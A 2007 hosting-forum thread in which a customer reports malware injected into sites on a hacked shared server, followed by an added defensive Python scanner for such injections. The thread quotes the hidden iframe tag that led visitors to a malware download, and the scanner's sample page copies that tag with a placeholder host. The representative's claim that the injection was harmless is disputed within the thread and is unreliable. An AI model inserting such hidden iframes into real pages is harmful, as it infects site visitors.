#1
03-01-2007, 13:07
DavidAllen (Premium Member; Join Date: Jan 2007; Location: Amersham; Posts: 331)
Malware Links on Server

I reported before Xmas (16th Dec) that the server 64.38.20.218 had been hacked and that a line of code that attempted to d/load malware had been added to virtually every domain on that server.
Since then the only response I have had is an email from Andy in Tech Support saying they were passing it on to 'Senior Admin'. I have requested more information several times, but nothing.
The line of code that was added to the websites was:
<iframe src="http://mortimercomprehensive.co.uk/images/opennight/thumbs/tmp1/index.php" frameborder=0 border=0 height=0 width=0 style="display: none"></iframe>
This eventually leads to a page with encrypted code that d/loads nasty malware to the user's computer.
To my mind this is a serious issue.
The server has been hacked on at least 2 (probably 3) separate occasions.
EUK have partially cleaned up by replacing mortimercomprehensive.co.uk with google.co.uk on some of the websites - but several still remain with the original intact and are still infecting visitors to those websites.
What is happening EUK???
#2
03-01-2007, 13:22
eUKhost.com (Chief Marketing Officer; Join Date: Sep 2005; Posts: 4,261)

We had tried to upgrade the kernel on this server a couple of times in the last 3 months, but every time the upgrade failed.

Our senior system admins, as well as some other well-known system admins, failed to complete the upgrade. Someone managed to exploit the old kernel and ran a mass injection script which added iframe code to the index pages of all websites hosted on the server.

We have system admins who are experts in kernel upgrades, but the typical make of this server was responsible for the failure of the upgrade. We managed to successfully upgrade the kernel version on 26th Dec 2006 and now the server is safe. We've also found the website which was targeted to run this mass injection script, and that account was previously terminated from the server.

We cannot give such updates to all customers hosted on the respective servers, and most of the customers have no knowledge of the kernel or Linux, and such minor problems may raise questions in their minds.

We ran a replace command to replace the injection with google.co.uk twice in the month of December. This injection was getting executed in IE only and it was just an image, and there were no virus website links or anything harmful for visitors' computers.

This should not be considered a hacking attempt or any major problem, as iframe code injection is much different from a root exploit or hacking.
#3
03-01-2007, 13:36
DavidAllen (Premium Member; Join Date: Jan 2007; Location: Amersham; Posts: 331)

The code is still on several websites on that server - so the replace command needs re-running.
It doesn't just lead to 'just an image'; it leads to a page with another hidden iframe which displays a page (mn.html) with the following code on it:
If you decode that lot you will find that it tries to d/load and execute a file called ld.exe, which in turn d/loads further malware!!!

I appreciate you can't tell everyone on the server - but I reported the problem and was left wondering what to do. I had no information about when/if you were running your replace command, so I had to manually edit all the websites I control.

The code is still there on several sites!!!

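As an added example (not code from the thread, from eUKhost or from David), here is a defender-side scanner for the injection shape this thread describes: a zero-size, display:none iframe whose src points off-site. It reports such frames across a web root and strips the whole tag rather than swapping the src domain; the sample page, the attacker.example host and the own_hosts allow-list are constructed/assumed.

```python
"""Find and strip injected hidden iframes under a web root (added example, not
from the thread or the host). Matches the pattern David describes: a 0x0,
display:none iframe whose src is off-site; the sample page is constructed."""
import os
import re
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b[^>]*>(?:\s*</iframe>)?", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
HIDDEN_RE = re.compile(r"""display\s*:\s*none|\b(?:height|width)\s*=\s*["']?0\b""",
                       re.IGNORECASE)

# Constructed copy of the injected tag shape; attacker.example is a placeholder host.
INJECTED_PAGE = ('<html><body><p>Welcome</p><iframe src="http://attacker.example/tmp1/'
                 'index.php" frameborder=0 border=0 height=0 width=0 '
                 'style="display: none"></iframe></body></html>')


def find_hidden_iframes(html, own_hosts=()):
    """Return src URLs of hidden iframes in one page, skipping our own hosts."""
    hits = []
    for tag in (m.group(0) for m in IFRAME_RE.finditer(html)):
        if not HIDDEN_RE.search(tag):
            continue  # visible frame (video embed etc.): leave it alone
        m = SRC_RE.search(tag)
        src = m.group(1) if m else ""
        if (urlparse(src).hostname or "") not in own_hosts:
            hits.append(src)
    return hits


def strip_hidden_iframes(html, own_hosts=()):
    """Remove the whole tag; swapping the src domain leaves the hook in place."""
    return IFRAME_RE.sub(lambda m: "" if find_hidden_iframes(m.group(0), own_hosts)
                         else m.group(0), html)


def scan_webroot(root, own_hosts=(), exts=(".html", ".htm", ".php")):
    """Walk root; return {path: [src, ...]} for every page carrying an injection."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_hidden_iframes(fh.read(), own_hosts)
                if hits:
                    findings[path] = hits
    return findings
```

A hidden frame whose src was merely rewritten to another domain is still reported, which is why the cleanup function removes the tag instead of editing its URL.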
Copyright © 2001-2008, eUKhost.com. All rights reserved.